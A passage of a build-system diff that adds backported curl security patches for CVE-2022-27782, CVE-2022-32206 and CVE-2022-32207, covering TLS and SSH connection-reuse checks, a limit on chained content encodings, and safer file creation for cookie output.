+     if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+-       !data->set.proxy_ssl.authtype)
+-      data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++       !data->set.proxy_ssl.primary.authtype)
++      data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
+     break;
+   case CURLOPT_TLSAUTH_TYPE:
+     argptr = va_arg(param, char *);
+     if(!argptr ||
+        strncasecompare(argptr, "SRP", strlen("SRP")))
+-      data->set.ssl.authtype = CURL_TLSAUTH_SRP;
++      data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
+     else
+-      data->set.ssl.authtype = CURL_TLSAUTH_NONE;
++      data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
+     break;
+   case CURLOPT_PROXY_TLSAUTH_TYPE:
+     argptr = va_arg(param, char *);
+     if(!argptr ||
+        strncasecompare(argptr, "SRP", strlen("SRP")))
+-      data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
++      data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
+     else
+-      data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
++      data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
+     break;
+ #endif
+ #ifdef USE_ARES
+diff --git a/lib/url.c b/lib/url.c
+index efa3dc7..6518be9 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+   set->ssl.primary.verifypeer = TRUE;
+   set->ssl.primary.verifyhost = TRUE;
+ #ifdef USE_TLS_SRP
+-  set->ssl.authtype = CURL_TLSAUTH_NONE;
++  set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ #endif
+   set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
+                                                       type */
+@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+   data->set.proxy_ssl.primary.pinned_key =
+     data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
+ 
+-  data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+-  data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
++  data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
++  data->set.proxy_ssl.primary.CRLfile =
++    data->set.str[STRING_SSL_CRLFILE_PROXY];
+   data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+   data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+   data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
+   data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
+   data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
+ #ifdef USE_TLS_SRP
+-  data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
+-  data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
+-  data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
+-  data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
++  data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
++  data->set.proxy_ssl.primary.username =
++    data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
++  data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
++  data->set.proxy_ssl.primary.password =
++    data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
+ #endif
+ 
+   if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ab1b267..ad0ef8f 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -231,6 +231,13 @@ struct ssl_primary_config {
+   char *cipher_list;     /* list of ciphers to use */
+   char *cipher_list13;   /* list of TLS 1.3 cipher suites to use */
+   char *pinned_key;
++  char *CRLfile;         /* CRL to check certificate revocation */
++  #ifdef USE_TLS_SRP
++    char *username; /* TLS username (for, e.g., SRP) */
++    char *password; /* TLS password (for, e.g., SRP) */
++    enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
++  #endif
++  unsigned char ssl_options;  /* the CURLOPT_SSL_OPTIONS bitmask */
+   BIT(verifypeer);       /* set TRUE if this is desired */
+   BIT(verifyhost);       /* set TRUE if CN/SAN must match hostname */
+   BIT(verifystatus);     /* set TRUE if certificate status must be checked */
+@@ -240,7 +247,6 @@ struct ssl_primary_config {
+ struct ssl_config_data {
+   struct ssl_primary_config primary;
+   long certverifyresult; /* result from the certificate verification */
+-  char *CRLfile;   /* CRL to check certificate revocation */
+   curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+   void *fsslctxp;        /* parameter for call back */
+   char *cert; /* client certificate file name */
+@@ -248,11 +254,6 @@ struct ssl_config_data {
+   char *key; /* private key file name */
+   char *key_type; /* format for private key (default: PEM) */
+   char *key_passwd; /* plain text private key password */
+-#ifdef USE_TLS_SRP
+-  char *username; /* TLS username (for, e.g., SRP) */
+-  char *password; /* TLS password (for, e.g., SRP) */
+-  enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
+-#endif
+   BIT(certinfo);     /* gather lots of certificate info */
+   BIT(falsestart);
+   BIT(enable_beast); /* allow this flaw for interoperability's sake*/
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 3d0758d..92c301c 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
+   }
+ 
+ #ifdef USE_TLS_SRP
+-  if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++  if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
+      Curl_allow_auth_to_host(data)) {
+-    infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
++    infof(data, "Using TLS-SRP username: %s\n",
++          SSL_SET_OPTION(primary.username));
+ 
+     rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+     if(rc != GNUTLS_E_SUCCESS) {
+@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
+     }
+ 
+     rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
+-                                           SSL_SET_OPTION(username),
+-                                           SSL_SET_OPTION(password));
++                                           SSL_SET_OPTION(primary.username),
++                                           SSL_SET_OPTION(primary.password));
+     if(rc != GNUTLS_E_SUCCESS) {
+       failf(data, "gnutls_srp_set_client_cred() failed: %s",
+             gnutls_strerror(rc));
+@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
+   }
+ #endif
+ 
+-  if(SSL_SET_OPTION(CRLfile)) {
++  if(SSL_SET_OPTION(primary.CRLfile)) {
+     /* set the CRL list file */
+     rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
+-                                              SSL_SET_OPTION(CRLfile),
++                                              SSL_SET_OPTION(primary.CRLfile),
+                                               GNUTLS_X509_FMT_PEM);
+     if(rc < 0) {
+       failf(data, "error reading crl file %s (%s)",
+-            SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
++            SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
+       return CURLE_SSL_CRL_BADFILE;
+     }
+     else
+       infof(data, "found %d CRL in %s\n",
+-            rc, SSL_SET_OPTION(CRLfile));
++            rc, SSL_SET_OPTION(primary.CRLfile));
+   }
+ 
+   /* Initialize TLS session as a client */
+@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
+ 
+ #ifdef USE_TLS_SRP
+   /* put the credentials to the current session */
+-  if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++  if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
+     rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
+                                 BACKEND->srp_client_cred);
+     if(rc != GNUTLS_E_SUCCESS) {
+@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
+        SSL_CONN_CONFIG(verifyhost) ||
+        SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+-      if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+-         && SSL_SET_OPTION(username) != NULL
++      if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++         && SSL_SET_OPTION(primary.username) != NULL
+          && !SSL_CONN_CONFIG(verifypeer)
+          && gnutls_cipher_get(session)) {
+         /* no peer cert, but auth is ok if we have SRP user and cipher and no
+@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
+         failf(data, "server certificate verification failed. CAfile: %s "
+               "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
+               "none",
+-              SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
++              SSL_SET_OPTION(primary.CRLfile) ?
++              SSL_SET_OPTION(primary.CRLfile) : "none");
+         return CURLE_PEER_FAILED_VERIFICATION;
+       }
+       else
+@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
+   gnutls_certificate_free_credentials(BACKEND->cred);
+ 
+ #ifdef USE_TLS_SRP
+-  if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+-     && SSL_SET_OPTION(username) != NULL)
++  if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++     && SSL_SET_OPTION(primary.username) != NULL)
+     gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
+ #endif
+ 
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index 19df847..62d2b00 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
+   const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+   const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+   char * const ssl_cert = SSL_SET_OPTION(cert);
+-  const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++  const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+   const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
+     conn->host.name;
+   const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 86102f7..62fd7a2 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
+     }
+   }
+ 
+-  if(SSL_SET_OPTION(CRLfile)) {
+-    const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
++  if(SSL_SET_OPTION(primary.CRLfile)) {
++    const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
+     if(rv) {
+       result = rv;
+       goto error;
+     }
+-    infof(data, "  CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
++    infof(data, "  CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
+   }
+ 
+   if(SSL_SET_OPTION(cert)) {
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index a14cecc..ec5a8f5 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+     &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
+   const long int ssl_version = SSL_CONN_CONFIG(version);
+ #ifdef USE_TLS_SRP
+-  const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
++  const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
+ #endif
+   char * const ssl_cert = SSL_SET_OPTION(cert);
+   const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
+   const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+   const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+   const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+-  const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++  const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+   char error_buffer[256];
+ 
+   DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
+@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #ifdef USE_TLS_SRP
+   if((ssl_authtype == CURL_TLSAUTH_SRP) &&
+      Curl_allow_auth_to_host(data)) {
+-    char * const ssl_username = SSL_SET_OPTION(username);
+-
++    char * const ssl_username = SSL_SET_OPTION(primary.username);
++    char * const ssl_password = SSL_SET_OPTION(primary.password);
+     infof(data, "Using TLS-SRP username: %s\n", ssl_username);
+ 
+     if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
+       failf(data, "Unable to set SRP user name");
+       return CURLE_BAD_FUNCTION_ARGUMENT;
+     }
+-    if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
++    if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
+       failf(data, "failed setting SRP password");
+       return CURLE_BAD_FUNCTION_ARGUMENT;
+     }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e38f74e..e8cb70f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ {
+   if((data->version == needle->version) &&
+      (data->version_max == needle->version_max) &&
++     (data->ssl_options == needle->ssl_options) &&
+      (data->verifypeer == needle->verifypeer) &&
+      (data->verifyhost == needle->verifyhost) &&
+      (data->verifystatus == needle->verifystatus) &&
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
new file mode 100644
index 0000000000..3d56025210
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
+From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] url: check SSH config match on connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/url.c      | 11 +++++++++++
+ lib/vssh/ssh.h |  6 +++---
+ 2 files changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 6518be9..8da0245 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
+   }
+ }
+ 
++static bool ssh_config_matches(struct connectdata *one,
++                               struct connectdata *two)
++{
++  return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
++          Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
++}
+ /*
+  * Given one filled in connection struct (named needle), this function should
+  * detect if there already is one that has all the significant details
+@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
+         }
+       }
+ 
++      if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++        if(!ssh_config_matches(needle, check))
++          continue;
++      }
++
+       if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+          needle->bits.tunnel_proxy) {
+         /* The requested connection does not use a HTTP proxy or it uses SSL or
+diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
+index 0d4ee52..8f2632e 100644
+--- a/lib/vssh/ssh.h
++++ b/lib/vssh/ssh.h
+@@ -7,7 +7,7 @@
+  *                            | (__| |_| |  _ <| |___
+  *                             \___|\___/|_| \_\_____|
+  *
+- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
+  *
+  * This software is licensed as described in the file COPYING, which
+  * you should have received as part of this distribution. The terms
+@@ -120,8 +120,8 @@ struct ssh_conn {
+ 
+   /* common */
+   const char *passphrase;     /* pass-phrase to use */
+-  char *rsa_pub;              /* path name */
+-  char *rsa;                  /* path name */
++  char *rsa_pub;              /* strdup'ed public key file */
++  char *rsa;                  /* strdup'ed private key file */
+   bool authed;                /* the connection has been authenticated fine */
+   sshstate state;             /* always use ssh.c:state() to change state! */
+   sshstate nextstate;         /* the state to goto after stopping */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32206.patch b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
new file mode 100644
index 0000000000..3d76aeb43d
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
+From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 16 May 2022 16:28:13 +0200
+Subject: [PATCH] content_encoding: return error on too many compression steps
+
+The max allowed steps is arbitrarily set to 5.
+
+Bug: https://curl.se/docs/CVE-2022-32206.html
+CVE-2022-32206
+Reported-by: Harry Sintonen
+Closes #9049
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/content_encoding.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 6d47537..91e621f 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
+   return NULL;
+ }
+ 
++/* allow no more than 5 "chained" compression steps */
++#define MAX_ENCODE_STACK 5
++
+ /* Set-up the unencoding stack from the Content-Encoding header value.
+  * See RFC 7231 section 3.1.2.2. */
+ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+   struct Curl_easy *data = conn->data;
+   struct SingleRequest *k = &data->req;
++  int counter = 0;
+ 
+   do {
+     const char *name;
+@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+       if(!encoding)
+         encoding = &error_encoding;  /* Defer error at stack use. */
+ 
++      if(++counter >= MAX_ENCODE_STACK) {
++        failf(data, "Reject response due to %u content encodings",
++              counter);
++        return CURLE_BAD_CONTENT_ENCODING;
++      }    
+       /* Stack the unencoding stage. */
+       writer = new_unencoding_writer(conn, encoding, k->writer_stack);
+       if(!writer)
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
+From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 25 May 2022 10:09:53 +0200
+Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
+
+Bug: https://curl.se/docs/CVE-2022-32207.html
+CVE-2022-32207
+Reported-by: Harry Sintonen
+Closes #9050
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ CMakeLists.txt          |   1 +
+ configure.ac            |   1 +
+ lib/Makefile.inc        |   4 +-
+ lib/cookie.c            |  19 ++-----
+ lib/curl_config.h.cmake |   3 ++
+ lib/fopen.c             | 113 ++++++++++++++++++++++++++++++++++++++++
+ lib/fopen.h             |  30 +++++++++++
+ 7 files changed, 155 insertions(+), 16 deletions(-)
+ create mode 100644 lib/fopen.c
+ create mode 100644 lib/fopen.h
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 73b053b..cc587b0 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
+   set(CMAKE_REQUIRED_LIBRARIES socket)
+ endif()
+ 
++check_symbol_exists(fchmod        "${CURL_INCLUDES}" HAVE_FCHMOD)
+ check_symbol_exists(basename      "${CURL_INCLUDES}" HAVE_BASENAME)
+ check_symbol_exists(socket        "${CURL_INCLUDES}" HAVE_SOCKET)
+ check_symbol_exists(select        "${CURL_INCLUDES}" HAVE_SELECT)
+diff --git a/configure.ac b/configure.ac
+index d090622..7071077 100755
+--- a/configure.ac
++++ b/configure.ac
+@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
+ 
+ 
+ AC_CHECK_FUNCS([fnmatch \
++  fchmod \
+   geteuid \
+   getpass_r \
+   getppid \
+diff --git a/lib/Makefile.inc b/lib/Makefile.inc
+index 46ded90..79307d8 100644
+--- a/lib/Makefile.inc
++++ b/lib/Makefile.inc
+@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c   \
+   curl_multibyte.c hostcheck.c conncache.c dotdot.c                     \
+   x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c      \
+   mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c  \
+-  doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
++  doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
+ 
+ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+   formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h         \
+@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+   x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h           \
+   curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h     \
+   curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h        \
+-  curl_get_line.h altsvc.h quic.h socketpair.h rename.h
++  curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
+ 
+ LIB_RCFILES = libcurl.rc
+ 
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1..a9ad20a 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -97,8 +97,8 @@ Example set of cookies:
+ #include "curl_memrchr.h"
+ #include "inet_pton.h"
+ #include "parsedate.h"
+-#include "rand.h"
+ #include "rename.h"
++#include "fopen.h"
+ 
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
+     use_stdout = TRUE;
+   }
+   else {
+-    unsigned char randsuffix[9];
+-
+-    if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
+-      return 2;
+-
+-    tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
+-    if(!tempstore)
+-      return 1;
+-
+-    out = fopen(tempstore, FOPEN_WRITETEXT);
+-    if(!out)
+-      goto error;
++      error = Curl_fopen(data, filename, &out, &tempstore);
++      if(error)
++        goto error;
+   }
+ 
+   fputs("# Netscape HTTP Cookie File\n"
+@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
+   if(!use_stdout) {
+     fclose(out);
+     out = NULL;
+-    if(Curl_rename(tempstore, filename)) {
++    if(tempstore && Curl_rename(tempstore, filename)) {
+       unlink(tempstore);
+       goto error;
+     }
+diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
+index 98cdf51..fe43751 100644
+--- a/lib/curl_config.h.cmake
++++ b/lib/curl_config.h.cmake
+@@ -124,6 +124,9 @@
+ /* Define to 1 if you have the <assert.h> header file. */
+ #cmakedefine HAVE_ASSERT_H 1
+ 
++/* Define to 1 if you have the `fchmod' function. */
++#cmakedefine HAVE_FCHMOD 1
++
+ /* Define to 1 if you have the `basename' function. */
+ #cmakedefine HAVE_BASENAME 1
+ 
+diff --git a/lib/fopen.c b/lib/fopen.c
+new file mode 100644
+index 0000000..ad3691b
+--- /dev/null
++++ b/lib/fopen.c
+@@ -0,0 +1,113 @@
++/***************************************************************************
++ *                                  _   _ ____  _
++ *  Project                     ___| | | |  _ \| |
++ *                             / __| | | | |_) | |
++ *                            | (__| |_| |  _ <| |___
++ *                             \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) ||  \
++  !defined(CURL_DISABLE_HSTS)
++
++#ifdef HAVE_FCNTL_H
++#include <fcntl.h>
++#endif
++
++#include "urldata.h"
++#include "rand.h"
++#include "fopen.h"
++/* The last 3 #include files should be in this order */
++#include "curl_printf.h"
++#include "curl_memory.h"
++#include "memdebug.h"
++
++/*
++ * Curl_fopen() opens a file for writing with a temp name, to be renamed
++ * to the final name when completed. If there is an existing file using this
++ * name at the time of the open, this function will clone the mode from that
++ * file.  if 'tempname' is non-NULL, it needs a rename after the file is
++ * written.
++ */
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++                    FILE **fh, char **tempname)
++{
++  CURLcode result = CURLE_WRITE_ERROR;
++  unsigned char randsuffix[9];
++  char *tempstore = NULL;
++  struct_stat sb;
++  int fd = -1;
++  *tempname = NULL;
++
++  if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
++    /* a non-regular file, fallback to direct fopen() */
++    *fh = fopen(filename, FOPEN_WRITETEXT);
++    if(*fh)
++      return CURLE_OK;
++    goto fail;
++  }
++
++  result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
++  if(result)
++    goto fail;
++
++  tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
++  if(!tempstore) {
++    result = CURLE_OUT_OF_MEMORY;
++    goto fail;
++  }
++
++  result = CURLE_WRITE_ERROR;
++  fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
++  if(fd == -1)
++    goto fail;
++
++#ifdef HAVE_FCHMOD
++  {
++    struct_stat nsb;
++    if((fstat(fd, &nsb) != -1) &&
++       (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
++      /* if the user and group are the same, clone the original mode */
++      if(fchmod(fd, sb.st_mode) == -1)
++        goto fail;
++    }
++  }
++#endif
++
++  *fh = fdopen(fd, FOPEN_WRITETEXT);
++  if(!*fh)
++    goto fail;
++
++  *tempname = tempstore;
++  return CURLE_OK;
++
++fail:
++  if(fd != -1) {
++    close(fd);
++    unlink(tempstore);
++  }
++
++  free(tempstore);
++
++  *tempname = NULL;
++  return result;
++}
++
++#endif /* ! disabled */
+diff --git a/lib/fopen.h b/lib/fopen.h
+new file mode 100644
+index 0000000..289e55f
+--- /dev/null
++++ b/lib/fopen.h
+@@ -0,0 +1,30 @@
++#ifndef HEADER_CURL_FOPEN_H
++#define HEADER_CURL_FOPEN_H
++/***************************************************************************
++ *                                  _   _ ____  _
++ *  Project                     ___| | | |  _ \| |
++ *                             / __| | | | |_) | |
++ *                            | (__| |_| |  _ <| |___
++ *                             \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++                    FILE **fh, char **tempname);
++
++#endif
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32208.patch b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
new file mode 100644
index 0000000000..2939314d09
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
+From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Jun 2022 09:27:24 +0200
+Subject: [PATCH] krb5: return error properly on decode errors
+
+Bug: https://curl.se/docs/CVE-2022-32208.html
+CVE-2022-32208
